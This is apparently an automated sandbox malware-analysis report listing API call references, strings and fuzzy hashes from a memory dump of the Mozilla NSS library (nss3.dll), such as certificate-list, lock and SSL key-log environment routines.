                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Enter$CriticalSectionUnlockValue$ErrorMonitor$ExitInternalItem_K11_SlotUtilZfreememcpymemsetstrcmpstrlen
                                                                                                                                                                                                                                                                                                                      • String ID: k-l$k-l
                                                                                                                                                                                                                                                                                                                      • API String ID: 568628329-2691625188
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f72f052078724b44390ca708e34e3a399b0e529d6554395e115f377265337990
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9dc1f8e3f6fea59c2a0c7279c80d4174a001f9af79994fa9021835619c4907ee
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f72f052078724b44390ca708e34e3a399b0e529d6554395e115f377265337990
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8991C1B2D502059BEB109F75DC41BAB77B8AF0531CF244129EC09A7B11EB31E959C7E1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6CE89FBE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CE62F0A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE62F1D
                                                                                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CE8A015
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA1940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6CEA563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6CEA195C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA1940: EnterCriticalSection.KERNEL32(?,?,6CEA563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6CE7EAC5,00000001), ref: 6CEA1970
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA1940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6CE7EAC5,00000001,?,6CE7CE9B,00000001,6CE7EAC5), ref: 6CEA19A0
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6CE8A067
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CE8A055
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: TlsGetValue.KERNEL32(?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4C97
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4CB0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4CC9
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE8A07E
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CE8A0B1
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6CE8A0C7
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6CE8A0CF
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CE8A12E
                                                                                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6CE8A140
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6CE8A148
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE8A158
                                                                                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6CE8A175
                                                                                                                                                                                                                                                                                                                      • CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6CE8A1A5
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CE8A1B2
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE8A1C6
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertList.NSS3(00000000), ref: 6CE8A1D6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA55E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6CE7EAC5,00000001,?,6CE7CE9B,00000001,6CE7EAC5,00000003,-00000004,00000000,?,6CE7EAC5), ref: 6CEA5627
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA55E0: PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0,?,?,?,?,?,?,?,?,?,?,6CE7EAC5,00000001,?,6CE7CE9B), ref: 6CEA564F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA55E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE7EAC5,00000001), ref: 6CEA5661
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA55E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE7EAC5), ref: 6CEA56AF
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
                                                                                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                                                                                      • API String ID: 3250630715-3315324353
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d63121a17dffb8c46f963a4727ab2465db1121be94ca8bddebe58b6f4c5292ae
                                                                                                                                                                                                                                                                                                                      • Instruction ID: e13f50e4575ea63dda7134144cd5c9bf34df8da6ed5b3651c267e86cb7f04b8a
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d63121a17dffb8c46f963a4727ab2465db1121be94ca8bddebe58b6f4c5292ae
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0951EBB5E412055BEB009BA5DD44BAF7378BF4670CF304128E819ABB81E775D509C7A3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEA4C4C
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CEA4C60
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA4CA1
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CEA4CBE
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA4CD2
                                                                                                                                                                                                                                                                                                                      • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA4D3A
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA4D4F
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA4DB7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: TlsGetValue.KERNEL32 ref: 6CF0DD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DDB4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507AD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507CD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507D6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CDE204A), ref: 6CE507E4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,6CDE204A), ref: 6CE50864
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE50880
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,6CDE204A), ref: 6CE508CB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508D7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508FB
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEA4DD7
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CEA4DEC
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEA4E1B
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEA4E2F
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA4E5A
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEA4E71
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEA4E7A
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEA4EA2
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEA4EC1
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CEA4ED6
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEA4F01
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEA4F2A
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 759471828-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 39187f27135b05afefb4425fe29ca8fb169eca30129d048318a6282874aa39c3
                                                                                                                                                                                                                                                                                                                      • Instruction ID: ee996a37c91aaf41527517e2c381713be30d07840a323864164716b9c8f73dc2
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39187f27135b05afefb4425fe29ca8fb169eca30129d048318a6282874aa39c3
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BB11775E002059FDB40EFA8D885BAA77B4BF0931CF246125ED159BB01EB30E966CBD1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEAFFB4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: calloc.MOZGLUE(00000001,00000084,6CE50936,00000001,?,6CE5102C), ref: 6CF298E5
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEAFFC6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CF29946
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CDE16B7,00000000), ref: 6CF2994E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: free.MOZGLUE(00000000), ref: 6CF2995E
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEAFFD6
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEAFFE6
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEAFFF6
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB0006
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB0016
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB0026
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB0036
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB0046
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB0056
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB0066
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB0076
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB0086
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB0096
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB00A6
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB00B6
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB00C6
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB00D6
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6CEA76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6CE775C2,00000000), ref: 6CEB00E6
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1407103528-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d17fd0ebe6317a3828adcb88209df0204cc2b6683d055813bc5dd43440d3eff6
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d24455dfeddbbb531bd4e0b5ba80cf5ac7046371e10879136c9876bc7bc450b4
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d17fd0ebe6317a3828adcb88209df0204cc2b6683d055813bc5dd43440d3eff6
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B31CDF0F216149F8BC9DFB5854838B3AB4E716A09B54712AD45487702DBBE034ACFA5
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CEF6BF7), ref: 6CEF6EB6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: TlsGetValue.KERNEL32(00000040,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE51267
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: EnterCriticalSection.KERNEL32(?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE5127C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE51291
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: PR_Unlock.NSS3(?,?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE512A0
                                                                                                                                                                                                                                                                                                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CF9FC0A,6CEF6BF7), ref: 6CEF6ECD
                                                                                                                                                                                                                                                                                                                      • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CEF6EE0
                                                                                                                                                                                                                                                                                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CEF6EFC
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6CEF6F04
                                                                                                                                                                                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CEF6F18
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CEF6BF7), ref: 6CEF6F30
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CEF6BF7), ref: 6CEF6F54
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CEF6BF7), ref: 6CEF6FE0
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CEF6BF7), ref: 6CEF6FFD
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • SSLFORCELOCKS, xrefs: 6CEF6F2B
                                                                                                                                                                                                                                                                                                                      • # SSL/TLS secrets log file, generated by NSS, xrefs: 6CEF6EF7
                                                                                                                                                                                                                                                                                                                      • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CEF6FDB
                                                                                                                                                                                                                                                                                                                      • SSLKEYLOGFILE, xrefs: 6CEF6EB1
                                                                                                                                                                                                                                                                                                                      • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CEF6F4F
                                                                                                                                                                                                                                                                                                                      • NSS_SSL_CBC_RANDOM_IV, xrefs: 6CEF6FF8
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                                                                                                                                      • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                                                                                                                                      • API String ID: 412497378-2352201381
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9dbd21000ccfb21b10baabe3883f7e3c421d178efa5a95ae8684809832c16947
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f23299be74431ca72b1e952629d6909d9b388bf97bb03313bd3c227158345ae8
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dbd21000ccfb21b10baabe3883f7e3c421d178efa5a95ae8684809832c16947
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDA1E6F2F6698197E7904A2CC80138536B6AB8332AF784365E831C7FD5DBF599438242
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE75DEC
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CE75E0F
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000828), ref: 6CE75E35
                                                                                                                                                                                                                                                                                                                      • SECKEY_CopyPublicKey.NSS3(?), ref: 6CE75E6A
                                                                                                                                                                                                                                                                                                                      • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CE75EC3
                                                                                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CE75ED9
                                                                                                                                                                                                                                                                                                                      • SECKEY_SignatureLen.NSS3(?), ref: 6CE75F09
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CE75F49
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CE75F89
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE75FA0
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CE75FB6
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE75FBF
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CE7600C
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CE76079
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE76084
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE76094
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
